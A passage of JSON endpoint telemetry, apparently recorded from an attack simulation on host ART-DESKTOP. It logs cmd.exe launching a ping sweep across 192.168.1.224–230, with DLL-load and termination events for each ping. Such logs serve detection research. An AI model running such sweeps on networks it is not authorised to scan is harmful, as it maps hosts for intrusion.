"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "process", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573086830000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.224", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573086990000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - 
}, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573086980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "event_type": "process", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573091990000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.225", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7928, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573092140000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "event_type": "process", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.226", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5520, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573097029984, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5520, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573096980000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "event_type": "process", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573101830000, - "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.227", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6296, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573101980000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "event_type": "process", - "pid": 6296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573106990000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.228", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 728, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 
131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 728, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573107140000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "event_type": "process", - "pid": 728, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573111990000, - "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.229", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6052, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": 
"{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": 
"C:\\Windows\\System32\\mswsock.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "process", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573116830000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.230", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { 
- "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": 